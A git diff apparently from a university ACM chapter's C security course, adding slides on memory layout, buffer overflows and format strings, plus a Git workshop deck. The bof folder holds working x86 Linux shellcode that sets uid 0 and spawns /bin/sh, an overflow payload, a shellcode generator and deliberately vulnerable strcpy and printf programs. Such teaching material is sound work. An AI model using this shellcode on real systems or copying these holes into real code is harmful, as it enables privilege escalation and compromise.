startHEADmaster

43 files changed, 728 insertions, 0 deletions

diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 1
+	xor		ebx, ebx
+	mov		bl, 123
+	int		0x80
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+from time import sleep
+from os import system
+
+
+shellcode = (
+    # Buffer offset
+    "\x90"*17 +
+
+	# Shellcode (55 chars)
+	"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+	"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+	"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+	"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
+
+    "\xf8\xf7\xff\xbf"
+    )
+
+cmd = "./exploitable " + shellcode
+
+print shellcode
diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c
new file mode 100644
index 0000000..5492a29
--- /dev/null
+++ b/c_seguridad/code/bof/exploitable.c
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdio.h>
+
+void vulnerable(char* str) {
+	printf("Entrando en vulnerable...\n");
+	char arr[60];
+	strcpy(arr, str);
+}
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		vulnerable(*(argv+1));
+	return 0;
+}
diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode
new file mode 100644
index 0000000..e36a2c5
--- /dev/null
+++ b/c_seguridad/code/bof/shellcode
@@ -0,0 +1 @@
+�����������������1À°F1Û1ÉÍ€ë1À[ˆC‰[‰C°�K�SÍ€èåÿÿÿ/bin/shNAAAABBBBø÷ÿ¿
diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
new file mode 100755
index 0000000..0221f48
--- /dev/null
+++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
@@ -0,0 +1,73 @@
+/**

+ *

+ * BlackLight's shellcode generator for Linux x86

+ * Tested anywhere, working & NULL-free

+ *

+ * Usage: ./generator <cmd>

+ * ...and then you've got a ready2inject NULL-free shellcode for the command you like

+ *

+ * copyleft 2008 by BlackLight <blacklight[at]autistici.org>

+ * < http://blacklight.gotdns.org >

+ *

+ * Released under GPL v.3 licence

+ *

+ * Greetz to: evilsocket, for the idea he gave me  ;) 

+ * Greetz to: my friends, who tested, used and appreciated this code and helped

+ *      me to improve it to what it is now

+ * Greetz to: my girl, next to me in any moment even if she had no idea

+ *      about what I was doing ^^

+ */

+

+#include <stdio.h>

+#include <stdlib.h>

+#include <string.h>

+

+char code[] =

+      "\\x60"                        /*pusha*/

+      "\\x31\\xc0"                   /*xor    %eax,%eax*/

+      "\\x31\\xd2"                   /*xor    %edx,%edx*/

+      "\\xb0\\x0b"                   /*mov    $0xb,%al*/

+      "\\x52"                        /*push   %edx*/

+      "\\x68\\x6e\\x2f\\x73\\x68"    /*push   $0x68732f6e*/

+      "\\x68\\x2f\\x2f\\x62\\x69"    /*push   $0x69622f2f*/

+      "\\x89\\xe3"                   /*mov    %esp,%ebx*/

+      "\\x52"                        /*push   %edx*/

+      "\\x68\\x2d\\x63\\x63\\x63"    /*push   $0x6363632d*/

+      "\\x89\\xe1"                   /*mov    %esp,%ecx*/

+      "\\x52"                        /*push   %edx*/

+      "\\xeb\\x07"                   /*jmp   804839a <cmd>*/

+      "\\x51"                        /*push   %ecx*/

+      "\\x53"                        /*push   %ebx*/

+      "\\x89\\xe1"                   /*mov    %esp,%ecx*/

+      "\\xcd\\x80"                   /*int    $0x80*/

+      "\\x61"                        /*popa*/

+      "\\xe8\\xf4\\xff\\xff\\xff"    /*call  8048393 <l1>*/;

+

+int main (int argc, char **argv)  {

+      int i,len=0;

+      char *shell,*cmd;

+

+      if (!argv[1])

+              exit(1);

+

+      for (i=1; i<argc; i++)

+              len += strlen(argv[i]);

+      len += argc;

+

+      cmd = (char*) malloc(len);

+

+      for (i=1; i<argc; i++)  {

+              strcat (cmd,argv[i]);

+              strcat (cmd,"\x20");

+      }

+

+      cmd[strlen(cmd)-1]=0;

+      shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );

+      memcpy (shell,code,sizeof(code));

+

+      for (i=0; i<strlen(cmd); i++)

+              sprintf (shell,"%s\\x%.2x",shell,cmd[i]);

+      printf ("%s\n",shell);

+}

+

+// milw0rm.com [2008-08-19]
\ No newline at end of file
diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm
new file mode 100644
index 0000000..00968ea
--- /dev/null
+++ b/c_seguridad/code/bof/shellex.asm
@@ -0,0 +1,25 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 70
+	xor		ebx, ebx
+	xor		ecx, ecx
+	int		0x80
+
+	jmp short ender
+
+starter:
+	xor		eax, eax
+	pop		ebx
+	mov		[ebx+7], al
+	mov		[ebx+8], ebx
+	mov		[ebx+12], eax
+	mov		al, 11
+	lea		ecx, [ebx+8]
+	lea		edx, [ebx+12]
+	int		0x80
+
+ender:
+	call starter
+	db "/bin/shNAAAABBBB"
diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c
new file mode 100644
index 0000000..c88c260
--- /dev/null
+++ b/c_seguridad/code/bof/test.c
@@ -0,0 +1,15 @@
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
+
+//char shellcode[] =
+//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";
+
+
+int main() {
+	int (*func)();
+	func = (int (*)()) shellcode;
+	(*func)();
+}
diff --git a/c_seguridad/code/formatst/ejemplodospuntoce.c b/c_seguridad/code/formatst/ejemplodospuntoce.c
new file mode 100644
index 0000000..6f7f181
--- /dev/null
+++ b/c_seguridad/code/formatst/ejemplodospuntoce.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		printf(argv[1]);
+	return 0;
+}
diff --git a/c_seguridad/code/formatst/ejemplotrespuntoce.c b/c_seguridad/code/formatst/ejemplotrespuntoce.c
new file mode 100644
index 0000000..8e49d87
--- /dev/null
+++ b/c_seguridad/code/formatst/ejemplotrespuntoce.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		printf("%s", argv[1]);
+	return 0;
+}
diff --git a/c_seguridad/code/stack/ejemplounopuntoce.c b/c_seguridad/code/stack/ejemplounopuntoce.c
new file mode 100644
index 0000000..4d2425e
--- /dev/null
+++ b/c_seguridad/code/stack/ejemplounopuntoce.c
@@ -0,0 +1,10 @@
+#include <stdlib.h>
+
+char global;
+float pi = 3.14;
+
+int main() {
+	int local;
+	char* buffer = (char*)malloc(20);
+	return 0;
+}
diff --git a/c_seguridad/code/stack/stack.c b/c_seguridad/code/stack/stack.c
new file mode 100644
index 0000000..2987356
--- /dev/null
+++ b/c_seguridad/code/stack/stack.c
@@ -0,0 +1,9 @@
+#include <stdlib.h>
+
+int global = 0x11111111;
+
+int main() {
+	int local = 0x22222222;
+	char buffer[] = "AAAABBBBCCCCDDD";
+	return 0;
+}
diff --git a/c_seguridad/code/strcmp.c b/c_seguridad/code/strcmp.c
new file mode 100644
index 0000000..23ab60a
--- /dev/null
+++ b/c_seguridad/code/strcmp.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <string.h>
+
+int main() {
+	char str1[] = "aaaa";
+	char str2[] = "aaaa";
+
+	if (strcmp(str1, str2) == 0)
+		printf("strcmp: Son iguales\n");
+	else
+		printf("strcmp: No son iguales\n");
+
+	if (str1 == str2)
+		printf("==: Son iguales\n");
+	else
+		printf("==: No son iguales\n");
+
+	return 0;
+}
diff --git a/c_seguridad/present/acm.png b/c_seguridad/present/acm.png
new file mode 100644
index 0000000..f083d8c
--- /dev/null
+++ b/c_seguridad/present/acm.png
diff --git a/c_seguridad/present/beamerthemeACM.sty b/c_seguridad/present/beamerthemeACM.sty
new file mode 100644
index 0000000..0d0e790
--- /dev/null
+++ b/c_seguridad/present/beamerthemeACM.sty
@@ -0,0 +1,68 @@
+\usetheme{Rochester}
+
+\RequirePackage{pgf}
+
+\pgfdeclareimage[width=1.0\paperwidth]{cabecera}{cabecera}
+
+\setbeamertemplate{blocks}[rounded][shadow=true]
+\setbeamercovered{transparent}
+
+\beamer@headheight=0.14\paperwidth
+
+\definecolor{oxygenorange}{HTML}{F7800A}
+\definecolor{oxygengray}{HTML}{686868}
+\definecolor{oxygenlightgray}{HTML}{EEEEEE}
+\definecolor{oxygenblue}{HTML}{236EAF}
+\setbeamercolor*{Title bar}{fg=white}
+\setbeamercolor*{Location bar}{fg=oxygenorange,bg=oxygenlightgray}
+\setbeamercolor*{frametitle}{parent=Title bar}
+\setbeamercolor*{block title}{bg=oxygenblue,fg=white}
+\setbeamercolor*{block body}{bg=oxygenlightgray,fg=oxygengray}
+\setbeamercolor*{normal text}{bg=white,fg=oxygengray}
+\setbeamercolor*{section in head/foot}{bg=oxygenblue,fg=white}
+
+\usecolortheme[named=oxygenorange]{structure}
+
+\setbeamerfont{section in head/foot}{size=\tiny,series=\normalfont}
+\setbeamerfont{frametitle}{size=\Large}
+
+%\setbeamertemplate{headline}
+\setbeamertemplate{frametitle}
+{
+  \vskip-0.25\beamer@headheight
+  \vskip-\baselineskip
+  \vskip-0.2cm
+  \hskip0.7cm\usebeamerfont*{frametitle}\insertframetitle
+  \vskip-0.10em
+  \hskip0.7cm\usebeamerfont*{framesubtitle}\insertframesubtitle
+}
+
+\setbeamertemplate{headline}
+{
+  \pgfuseimage{cabecera}
+  \vskip -1.95cm
+  \linethickness{0.0pt}
+
+  \framelatex{
+  \begin{beamercolorbox}[wd=\paperwidth,ht=0.3\beamer@headheight]{Title bar}
+    \usebeamerfont{section in head/foot}%
+    %\insertsectionnavigationhorizontal{0pt}{\hskip0.22cm}{}%
+  \end{beamercolorbox}}
+
+  \framelatex{
+  \begin{beamercolorbox}[wd=\paperwidth,ht=0.7\beamer@headheight]{Title bar}
+  \end{beamercolorbox}}
+}
+
+\setbeamertemplate{footline}
+{
+  \linethickness{0.25pt}
+  \framelatex{
+  \begin{beamercolorbox}[leftskip=.3cm,wd=\paperwidth,ht=0.3\beamer@headheight,sep=0.1cm]{Location bar}
+    \usebeamerfont{section in head/foot}%
+    \insertshortauthor~|~\insertshorttitle
+    \hfill
+    \insertframenumber/\inserttotalframenumber
+  \end{beamercolorbox}}
+}
+
diff --git a/c_seguridad/present/cabecera.png b/c_seguridad/present/cabecera.png
new file mode 100644
index 0000000..5c2f81c
--- /dev/null
+++ b/c_seguridad/present/cabecera.png
diff --git a/c_seguridad/present/img/Nuclear-Explosion.jpg b/c_seguridad/present/img/Nuclear-Explosion.jpg
new file mode 100644
index 0000000..f68597c
--- /dev/null
+++ b/c_seguridad/present/img/Nuclear-Explosion.jpg
diff --git a/c_seguridad/present/img/bof1.png b/c_seguridad/present/img/bof1.png
new file mode 100644
index 0000000..3b25c5e
--- /dev/null
+++ b/c_seguridad/present/img/bof1.png
diff --git a/c_seguridad/present/img/bof2.png b/c_seguridad/present/img/bof2.png
new file mode 100644
index 0000000..390d2a4
--- /dev/null
+++ b/c_seguridad/present/img/bof2.png
diff --git a/c_seguridad/present/img/dudas.jpg b/c_seguridad/present/img/dudas.jpg
new file mode 100644
index 0000000..3a5599c
--- /dev/null
+++ b/c_seguridad/present/img/dudas.jpg
diff --git a/c_seguridad/present/img/dudewtf.png b/c_seguridad/present/img/dudewtf.png
new file mode 100644
index 0000000..7f1b30c
--- /dev/null
+++ b/c_seguridad/present/img/dudewtf.png
diff --git a/c_seguridad/present/img/hacker.jpg b/c_seguridad/present/img/hacker.jpg
new file mode 100644
index 0000000..986d05a
--- /dev/null
+++ b/c_seguridad/present/img/hacker.jpg
diff --git a/c_seguridad/present/img/memoria_virtual.png b/c_seguridad/present/img/memoria_virtual.png
new file mode 100644
index 0000000..97f14f9
--- /dev/null
+++ b/c_seguridad/present/img/memoria_virtual.png
diff --git a/c_seguridad/present/img/memory_org.png b/c_seguridad/present/img/memory_org.png
new file mode 100644
index 0000000..17a9f0a
--- /dev/null
+++ b/c_seguridad/present/img/memory_org.png
diff --git a/c_seguridad/present/img/nuclear_explosion.png b/c_seguridad/present/img/nuclear_explosion.png
new file mode 100644
index 0000000..098dccc
--- /dev/null
+++ b/c_seguridad/present/img/nuclear_explosion.png
diff --git a/c_seguridad/present/img/ordenadorbob.jpg b/c_seguridad/present/img/ordenadorbob.jpg
new file mode 100644
index 0000000..479521c
--- /dev/null
+++ b/c_seguridad/present/img/ordenadorbob.jpg
diff --git a/c_seguridad/present/img/showmethecode.png b/c_seguridad/present/img/showmethecode.png
new file mode 100644
index 0000000..5ffd815
--- /dev/null
+++ b/c_seguridad/present/img/showmethecode.png
diff --git a/c_seguridad/present/img/smith.png b/c_seguridad/present/img/smith.png
new file mode 100644
index 0000000..ee7b3fe
--- /dev/null
+++ b/c_seguridad/present/img/smith.png
diff --git a/c_seguridad/present/img/stack_call_struct.png b/c_seguridad/present/img/stack_call_struct.png
new file mode 100644
index 0000000..7d61f4c
--- /dev/null
+++ b/c_seguridad/present/img/stack_call_struct.png
diff --git a/c_seguridad/present/img/stack_frame_struct.png b/c_seguridad/present/img/stack_frame_struct.png
new file mode 100644
index 0000000..adf21d3
--- /dev/null
+++ b/c_seguridad/present/img/stack_frame_struct.png
diff --git a/c_seguridad/present/img/stack_overflow.png b/c_seguridad/present/img/stack_overflow.png
new file mode 100644
index 0000000..1f33d35
--- /dev/null
+++ b/c_seguridad/present/img/stack_overflow.png
diff --git a/c_seguridad/present/img/stack_overflow_1.png b/c_seguridad/present/img/stack_overflow_1.png
new file mode 100644
index 0000000..25f5415
--- /dev/null
+++ b/c_seguridad/present/img/stack_overflow_1.png
diff --git a/c_seguridad/present/img/stack_overflow_2.png b/c_seguridad/present/img/stack_overflow_2.png
new file mode 100644
index 0000000..0963203
--- /dev/null
+++ b/c_seguridad/present/img/stack_overflow_2.png
diff --git a/c_seguridad/present/seguridad.tex b/c_seguridad/present/seguridad.tex
new file mode 100644
index 0000000..1a422fa
--- /dev/null
+++ b/c_seguridad/present/seguridad.tex
@@ -0,0 +1,280 @@
+% vim : tabstop 4
+%%%%%%%%%%%%%%%%%%%%
+% seguridad.tex - Transparencias de la sección de Seguridad del Curso de C
+% Guillermo Ramos Gutiérrez <wille@acm.asoc.fi.upm.es>
+%%%%%%%%%%%%%%%%%%%%%
+
+\documentclass{beamer}
+
+\mode<presentation>
+{
+	\usetheme{ACM}
+	\setbeamercovered{transparent}
+}
+
+\usepackage[spanish]{babel}
+\usepackage[utf8]{inputenc}
+\usepackage{times}
+\usepackage{color}
+
+\title[Curso de C: Seguridad]
+{Curso de C: Seguridad}
+
+\author[Guillermo Ramos]
+{
+Guillermo Ramos \\
+\texttt{wille@acm.asoc.fi.upm.es}
+}
+
+\institute[ACM FI - UPM]
+{
+ACM Facultad de Informática \\
+Universidad Politécnica de Madrid
+}
+
+\date{24 de marzo de 2011}
+
+\pgfdeclareimage[height=0.7cm]{acm-logo}{acm}
+\logo{\pgfuseimage{acm-logo}}
+
+\AtBeginSection[]
+{
+	\begin{frame}<beamer>
+		\frametitle{Contenido}
+		\tableofcontents[currentsection]
+	\end{frame}
+}
+
+\begin{document}
+
+	\begin{frame}
+		\titlepage
+	\end{frame}
+
+	\begin{frame}{Contenido}
+		\tableofcontents
+	\end{frame}
+
+	\section{¿De qué va todo esto?}
+		\begin{frame}{}
+			\begin{center}
+				\textbf{\huge 01010000}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{}
+			\begin{center}
+				\textbf{\huge 01010001} \\
+				\vspace{1cm}
+				\uncover<1>{¿0x50?} \\
+				\uncover<2>{¿push eax?} \\
+				\uncover<3>{¿true?}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{}
+			\begin{center}
+				\textbf{\huge 01010000} \\
+				\vspace{1cm}
+				$\surd$ 0x50 \\
+				$\surd$ push eax \\
+				$\surd$ true
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{}
+			\begin{center}
+				\includegraphics[width=3cm]{img/dudewtf.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{En resumen}
+			\begin{itemize}
+				\item Problema: \textbf{distinguir datos de código}
+				\item La información no tiene más significado que el que le da un proceso.
+				\item Esto se suele aprovechar para controlar los fallos de software y modificar el flujo de ejecución.
+			\end{itemize}
+		\end{frame}
+
+
+	\section{Memoria}
+		\subsection{Memoria Virtual}
+			\begin{frame}{Memoria Virtual}
+				\begin{center}
+					\includegraphics[width=6cm]{img/memoria_virtual.png}
+				\end{center}
+			\end{frame}
+
+		\subsection{Organización de memoria}
+			\begin{frame}{Organización de memoria}
+				\begin{center}
+					\includegraphics[width=6cm]{img/memory_org.png}
+				\end{center}
+			\end{frame}
+
+			\begin{frame}{Ejemplo}
+				\begin{center}
+					\begin{block}{ejemplounopuntocé.c}
+						char global; \\
+						float pi = 3.14; \\[3mm]
+						int main() \{  \\
+						\hspace{1cm}int local; \\
+						\hspace{1cm}char* buffer = (char*)malloc(20); \\
+						\hspace{1cm}return 0; \\
+						\}
+					\end{block}
+				\end{center}
+			\end{frame}
+
+			\begin{frame}{Ejemplo}
+				\begin{center}
+					\begin{block}{ejemplounopuntocé.c}
+						char global; \textcolor{red}{// bss} \\
+						float pi = 3.14; \textcolor{red}{// data} \\[3mm]
+						int main() \{ \textcolor{red}{// code} \\
+						\hspace{1cm}int local; \textcolor{red}{// stack} \\
+						\hspace{1cm}char* buffer = (char*)malloc(20); \textcolor{red}{// heap (*buffer)} \\
+						\hspace{1cm}return 0; \\
+						\}
+					\end{block}
+				\end{center}
+			\end{frame}
+
+		\subsection{La pila}
+			\begin{frame}{La pila}
+				Guarda el estado de las funciones en \textbf{marcos de pila} \\
+				Cada marco de pila almacena:
+				\begin{itemize}
+					\item Parámetros
+					\item Variables locales
+					\item Dirección de retorno de la función
+				\end{itemize}
+			\end{frame}
+
+			\begin{frame}{El marco de pila}
+				\begin{center}
+					\includegraphics[width=6cm]{img/stack_frame_struct.png}
+				\end{center}
+			\end{frame}
+
+			\begin{frame}{La pila}
+				\begin{center}
+					\includegraphics[width=6cm]{img/stack_call_struct.png}
+				\end{center}
+			\end{frame}
+
+			\begin{frame}{Ejemplos}
+				\begin{center}
+					\includegraphics[width=6cm]{img/showmethecode.png}
+				\end{center}
+			\end{frame}
+
+
+	\section{Buffer Overflows}
+		\begin{frame}{Introducción}
+			\begin{center}
+				\textit{At first I was like...} \\[3mm]
+				\includegraphics[width=8cm]{img/bof1.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Introducción}
+			\begin{center}
+				\textit{... but then I was like...} \\[3mm]
+				\includegraphics[width=7cm]{img/nuclear_explosion.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Introducción}
+			\begin{center}
+				Un buffer overflow ocurre cuando no se controla la cantidad de datos que se pueden
+				copiar en un buffer y se sigue escribiendo tras haberlo rellenado, provocando
+				la sobreescritura de la memoria adyacente a él. \\[3mm]
+				\includegraphics[width=6cm]{img/bof2.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Introducción}
+			\begin{center}
+				\includegraphics[width=8cm]{img/stack_overflow_1.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Introducción}
+			\begin{center}
+				\includegraphics[width=8cm]{img/stack_overflow_2.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Introducción}
+			\begin{center}
+				\includegraphics[width=8cm]{img/stack_overflow.png}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Ejemplos}
+			\begin{center}
+				\includegraphics[width=6cm]{img/showmethecode.png}
+			\end{center}
+		\end{frame}
+
+
+	\section{Format Strings}
+		\begin{frame}{Introducción}
+			\begin{center}
+				\begin{block}{ejemplodospuntocé.c}
+					int main(int argc, char** argv) \{  \\
+					\hspace{1cm}if (argc $>$ 1) \\
+					\hspace{2cm}printf(argv[1]); \\
+					\hspace{1cm}return 0; \\
+					\}
+				\end{block}
+				\begin{block}{ejemplotrespuntocé.c}
+					int main(int argc, char** argv) \{  \\
+					\hspace{1cm}if (argc $>$ 1) \\
+					\hspace{2cm}printf("\%s", argv[1]); \\
+					\hspace{1cm}return 0; \\
+					\}
+				\end{block}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x\%x}
+			\begin{center}
+				Un ataque de format strings es una inyección de caracteres que hace que printf() o cualquier
+				derivado interprete que debe insertar parámetros en la salida. Al no haberlos, usa memoria
+				de la pila.
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{Ejemplos}
+			\begin{center}
+				\includegraphics[width=6cm]{img/showmethecode.png}
+			\end{center}
+		\end{frame}
+
+
+	\section{}
+		\begin{frame}{}
+			\begin{center}
+				¿Dudas, preguntas? \\
+				\includegraphics[width=5cm]{img/dudas.jpg}
+			\end{center}
+		\end{frame}
+
+		\begin{frame}{}
+			\textbf{Bibliografía recomendada:}
+			\begin{thebibliography}{99}
+				\bibitem{} \htmladdnormallink{Erickson, J. (2008). \textit{The Art of Exploitation, 2nd Edition}}{http://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/}
+				\bibitem{} \htmladdnormallink{Anley, C., Heasman, J., Lindner, F., Richarte, G. (2007). \textit{The Shellcoder's
+				Handbook: Discovering and Exploiting Security Holes}}{http://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X/}
+			\end{thebibliography}
+		\end{frame}
+
+		\begin{frame}{}
+			\begin{center}
+				\textbf{¡Gracias por venir!}
+			\end{center}
+		\end{frame}
+
+\end{document}
diff --git a/git/present/Makefile b/git/present/Makefile
new file mode 100644
index 0000000..0fa5dda
--- /dev/null
+++ b/git/present/Makefile
@@ -0,0 +1,5 @@
+quick:
+	pdflatex git.tex
+
+release: quick
+	pdflatex git.tex
diff --git a/git/present/acm.png b/git/present/acm.png
new file mode 100644
index 0000000..f083d8c
--- /dev/null
+++ b/git/present/acm.png
diff --git a/git/present/beamerthemeACM.sty b/git/present/beamerthemeACM.sty
new file mode 100644
index 0000000..0d0e790
--- /dev/null
+++ b/git/present/beamerthemeACM.sty
@@ -0,0 +1,68 @@
+\usetheme{Rochester}
+
+\RequirePackage{pgf}
+
+\pgfdeclareimage[width=1.0\paperwidth]{cabecera}{cabecera}
+
+\setbeamertemplate{blocks}[rounded][shadow=true]
+\setbeamercovered{transparent}
+
+\beamer@headheight=0.14\paperwidth
+
+\definecolor{oxygenorange}{HTML}{F7800A}
+\definecolor{oxygengray}{HTML}{686868}
+\definecolor{oxygenlightgray}{HTML}{EEEEEE}
+\definecolor{oxygenblue}{HTML}{236EAF}
+\setbeamercolor*{Title bar}{fg=white}
+\setbeamercolor*{Location bar}{fg=oxygenorange,bg=oxygenlightgray}
+\setbeamercolor*{frametitle}{parent=Title bar}
+\setbeamercolor*{block title}{bg=oxygenblue,fg=white}
+\setbeamercolor*{block body}{bg=oxygenlightgray,fg=oxygengray}
+\setbeamercolor*{normal text}{bg=white,fg=oxygengray}
+\setbeamercolor*{section in head/foot}{bg=oxygenblue,fg=white}
+
+\usecolortheme[named=oxygenorange]{structure}
+
+\setbeamerfont{section in head/foot}{size=\tiny,series=\normalfont}
+\setbeamerfont{frametitle}{size=\Large}
+
+%\setbeamertemplate{headline}
+\setbeamertemplate{frametitle}
+{
+  \vskip-0.25\beamer@headheight
+  \vskip-\baselineskip
+  \vskip-0.2cm
+  \hskip0.7cm\usebeamerfont*{frametitle}\insertframetitle
+  \vskip-0.10em
+  \hskip0.7cm\usebeamerfont*{framesubtitle}\insertframesubtitle
+}
+
+\setbeamertemplate{headline}
+{
+  \pgfuseimage{cabecera}
+  \vskip -1.95cm
+  \linethickness{0.0pt}
+
+  \framelatex{
+  \begin{beamercolorbox}[wd=\paperwidth,ht=0.3\beamer@headheight]{Title bar}
+    \usebeamerfont{section in head/foot}%
+    %\insertsectionnavigationhorizontal{0pt}{\hskip0.22cm}{}%
+  \end{beamercolorbox}}
+
+  \framelatex{
+  \begin{beamercolorbox}[wd=\paperwidth,ht=0.7\beamer@headheight]{Title bar}
+  \end{beamercolorbox}}
+}
+
+\setbeamertemplate{footline}
+{
+  \linethickness{0.25pt}
+  \framelatex{
+  \begin{beamercolorbox}[leftskip=.3cm,wd=\paperwidth,ht=0.3\beamer@headheight,sep=0.1cm]{Location bar}
+    \usebeamerfont{section in head/foot}%
+    \insertshortauthor~|~\insertshorttitle
+    \hfill
+    \insertframenumber/\inserttotalframenumber
+  \end{beamercolorbox}}
+}
+
diff --git a/git/present/cabecera.png b/git/present/cabecera.png
new file mode 100644
index 0000000..5c2f81c
--- /dev/null
+++ b/git/present/cabecera.png
diff --git a/git/present/git.tex b/git/present/git.tex
new file mode 100644
index 0000000..f4099d1
--- /dev/null
+++ b/git/present/git.tex
@@ -0,0 +1,95 @@
+%%%%%%%%%%%%%%%%%%%%
+% git.tex - Transparencias del curso de Git
+% Guillermo Ramos Gutiérrez <wille@acm.asoc.fi.upm.es>
+%%%%%%%%%%%%%%%%%%%%%
+
+\documentclass{beamer}
+
+\mode<presentation>
+{
+	\usetheme{ACM}
+	\setbeamercovered{transparent}
+}
+
+\usepackage[spanish]{babel}
+\usepackage[utf8]{inputenc}
+\usepackage{times}
+\usepackage{color}
+
+\title[Taller de Git]
+{Taller de Git}
+
+\author[Guillermo Ramos]
+{
+Guillermo Ramos \\
+\texttt{wille@acm.asoc.fi.upm.es}
+}
+
+\institute[ACM FI - UPM]
+{
+ACM Facultad de Informática \\
+Universidad Politécnica de Madrid
+}
+
+\date{02 de febrero de 2012}
+
+\pgfdeclareimage[height=0.7cm]{acm-logo}{acm}
+\logo{\pgfuseimage{acm-logo}}
+
+\AtBeginSection[]
+{
+	\begin{frame}<beamer>
+		\frametitle{Contenido}
+		\tableofcontents[currentsection]
+	\end{frame}
+}
+
+\begin{document}
+
+	\begin{frame}
+		\titlepage
+	\end{frame}
+
+	\begin{frame}{Contenido}
+		\tableofcontents
+	\end{frame}
+
+	\section{Local}
+		\begin{frame}{}
+			\begin{center}
+				\includegraphics[width=7cm]{img/gitlocal.png}
+			\end{center}
+		\end{frame}
+
+	\section{Remoto}
+		\begin{frame}{}
+			\begin{center}
+				\includegraphics[width=7cm]{img/gitremote.png}
+			\end{center}
+		\end{frame}
+
+	\section{}
+		\begin{frame}{}
+			\begin{center}
+				\includegraphics[width=7cm]{img/reference.png} \\
+				\vspace{1cm}
+				\footnotesize http://tinyurl.com/tallergit-reference
+			\end{center}
+		\end{frame}
+
+	\section{}
+		\begin{frame}{}
+			\textbf{Bibliografía recomendada:}
+			\begin{thebibliography}{99}
+				\bibitem{} \htmladdnormallink{Chacon, Scott. \textit{Pro Git}}{http://progit.org/}
+				\bibitem{} \htmladdnormallink{Loeliger, Jon (2009). \textit{Version Control with Git}}{http://shop.oreilly.com/product/9780596520137.do}
+			\end{thebibliography}
+		\end{frame}
+
+		\begin{frame}{}
+			\begin{center}
+				\textbf{¡Gracias por venir!}
+			\end{center}
+		\end{frame}
+
+\end{document}
diff --git a/git/present/img/dudas.jpg b/git/present/img/dudas.jpg
new file mode 100644
index 0000000..3a5599c
--- /dev/null
+++ b/git/present/img/dudas.jpg
diff --git a/git/present/img/gitlocal.png b/git/present/img/gitlocal.png
new file mode 100644
index 0000000..ae2be7e
--- /dev/null
+++ b/git/present/img/gitlocal.png
diff --git a/git/present/img/gitremote.png b/git/present/img/gitremote.png
new file mode 100644
index 0000000..26ad541
--- /dev/null
+++ b/git/present/img/gitremote.png
diff --git a/git/present/img/reference.png b/git/present/img/reference.png
new file mode 100644
index 0000000..1b8a64c
--- /dev/null
+++ b/git/present/img/reference.png